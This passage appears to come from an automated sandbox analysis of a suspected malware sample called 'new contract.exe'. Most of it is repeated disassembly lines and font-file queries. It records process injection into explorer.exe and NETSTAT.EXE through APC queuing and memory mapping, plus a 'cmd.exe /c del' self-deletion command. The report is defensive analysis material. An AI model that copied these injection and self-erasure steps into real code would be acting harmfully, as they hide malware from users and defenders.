          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B62A0 mov eax, dword ptr fs:[00000030h]2_2_016B62A0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h]2_2_0165E284
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E284 mov eax, dword ptr fs:[00000030h]2_2_0165E284
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A0283 mov eax, dword ptr fs:[00000030h]2_2_016A0283
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165656A mov eax, dword ptr fs:[00000030h]2_2_0165656A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628550 mov eax, dword ptr fs:[00000030h]2_2_01628550
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628550 mov eax, dword ptr fs:[00000030h]2_2_01628550
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630535 mov eax, dword ptr fs:[00000030h]2_2_01630535
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E53E mov eax, dword ptr fs:[00000030h]2_2_0164E53E
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016B6500 mov eax, dword ptr fs:[00000030h]2_2_016B6500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016F4500 mov eax, dword ptr fs:[00000030h]2_2_016F4500
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016225E0 mov eax, dword ptr fs:[00000030h]2_2_016225E0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164E5E7 mov eax, dword ptr fs:[00000030h]2_2_0164E5E7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h]2_2_0165C5ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165C5ED mov eax, dword ptr fs:[00000030h]2_2_0165C5ED
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h]2_2_0165E5CF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E5CF mov eax, dword ptr fs:[00000030h]2_2_0165E5CF
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016265D0 mov eax, dword ptr fs:[00000030h]2_2_016265D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h]2_2_0165A5D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165A5D0 mov eax, dword ptr fs:[00000030h]2_2_0165A5D0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A05A7 mov eax, dword ptr fs:[00000030h]2_2_016A05A7
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h]2_2_016445B1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016445B1 mov eax, dword ptr fs:[00000030h]2_2_016445B1
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622582 mov eax, dword ptr fs:[00000030h]2_2_01622582
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01622582 mov ecx, dword ptr fs:[00000030h]2_2_01622582
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01654588 mov eax, dword ptr fs:[00000030h]2_2_01654588
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E59C mov eax, dword ptr fs:[00000030h]2_2_0165E59C
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AC460 mov ecx, dword ptr fs:[00000030h]2_2_016AC460
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164A470 mov eax, dword ptr fs:[00000030h]2_2_0164A470
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0165E443 mov eax, dword ptr fs:[00000030h]2_2_0165E443
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA456 mov eax, dword ptr fs:[00000030h]2_2_016DA456
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161645D mov eax, dword ptr fs:[00000030h]2_2_0161645D
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0164245A mov eax, dword ptr fs:[00000030h]2_2_0164245A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161E420 mov eax, dword ptr fs:[00000030h]2_2_0161E420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_0161C427 mov eax, dword ptr fs:[00000030h]2_2_0161C427
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016A6420 mov eax, dword ptr fs:[00000030h]2_2_016A6420
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01658402 mov eax, dword ptr fs:[00000030h]2_2_01658402
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016204E5 mov ecx, dword ptr fs:[00000030h]2_2_016204E5
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016264AB mov eax, dword ptr fs:[00000030h]2_2_016264AB
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016544B0 mov ecx, dword ptr fs:[00000030h]2_2_016544B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016AA4B0 mov eax, dword ptr fs:[00000030h]2_2_016AA4B0
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_016DA49A mov eax, dword ptr fs:[00000030h]2_2_016DA49A
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01628770 mov eax, dword ptr fs:[00000030h]2_2_01628770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Users\user\Desktop\new contract.exeCode function: 2_2_01630770 mov eax, dword ptr fs:[00000030h]2_2_01630770
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00682167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree, | 5_2_00682167
          Source: C:\Users\user\Desktop\new contract.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00685DC0 SetUnhandledExceptionFilter, | 5_2_00685DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00685C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, | 5_2_00685C30
          Source: C:\Users\user\Desktop\new contract.exe | Memory allocated: page read and write, page guard

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\new contract.exeNtQueueApcThread: Indirect: 0x117A4F2Jump to behavior
          Source: C:\Users\user\Desktop\new contract.exeNtClose: Indirect: 0x117A56C
          Source: C:\Users\user\Desktop\new contract.exeMemory written: C:\Users\user\Desktop\new contract.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 2580Jump to behavior
          Source: C:\Users\user\Desktop\new contract.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\Desktop\new contract.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 680000Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe5_2_006838D2
          Source: C:\Users\user\Desktop\new contract.exeProcess created: C:\Users\user\Desktop\new contract.exe "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\new contract.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 5_2_006858B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,5_2_006858B6
          Source: explorer.exe, 00000003.00000000.1745096473.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1752045440.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4137734556.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.1743468048.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4129060379.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000003.00000002.4129623359.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1743754861.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Users\user\Desktop\new contract.exe VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
